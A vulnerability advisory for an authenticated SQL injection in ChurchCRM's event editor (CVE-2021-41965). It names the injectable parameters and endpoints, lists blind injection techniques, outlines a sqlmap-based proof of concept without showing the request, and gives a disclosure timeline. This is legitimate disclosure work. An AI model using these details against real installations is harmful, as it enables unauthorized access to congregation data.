SQL Injection Vulnerability in ChurchCRM (CVE-2021-41965)
The manufacturer describes the product as follows (see 1):
“An OpenSource CRM System Built for Churches. Your Church can benefit from giving your staff and volunteers the tools they need to make every interaction more valuable.”
The software comes with an abundance of features relevant to churches and managing a congregation. Among others it allows to conduct:
- Conduct Fundraisers
- Manage Church Members
- Publish Events
- Manage Sunday Schools
The source code can be found on ChurchCRM’s GitHub account 2.
ChurchCRM is vulnerable to SQL injection attacks due to a lack of input validation and no additional protection mechanisms.
Church CRM allows its users to schedule church events, such as church services, Sunday school or summer camps. Once an event has been created it can also be edited and deleted again through the events page.
Hereby, it was detected that the parameter
EID, which is sent along when editing an existing entry, is susceptible to an SQL injection attack. On edit, data is posted to the
EventEditor.php where it is executed on the database.
EN_tyid parameter of the
theID of the
EventNames.php endpoint can be abused for injecting arbitrary SQL queries.
Different types of SQL injection techniques can be applied, including:
- Boolean-based blind
- Time-based blind
The vulnerable functionality is only accessible when authenticated.
Proof of Concept (PoC)
As a proof of concept, the EN_tyid parameter, which is sent when an event is edited, will be abused to query the database management system using sqlmap 3.
Let’s start with the HTTP request I had captured in Burp Suite.
This request could then be passed to sqlmap for injecting the
I had reached out immediately to the vendor via email on 2021-09-16, who never replied to my request. Following a responsible disclosure approach, I decided to file for a CVE and ultimately disclose the vulnerability publicly.
The overall timeline for disclosing this vulnerability was as follows:
- 2021-09-16: Vulnerability discovered
- 2021-09-16: Vulnerability reported to the manufacturer
- 2022-05-02: CVE has been reserved
- 2022-05-14: Public disclosure of the vulnerability
This security vulnerability was found by Alexander Bilz.
- E-Mail: mail[at]alexbilz.com
- Public Key: https://www.alexbilz.com/ABilz.asc
- Key ID: 0X474CECFD3DBC6880
- Key Fingerprint: 6C0E A8D0 C428 ED1D 8C2E C4A0 474C ECFD 3DBC 6880
The information provided in this security advisory is provided “as is” and without warranty of any kind. Details of this security advisory may be updated to provide as accurate information as possible.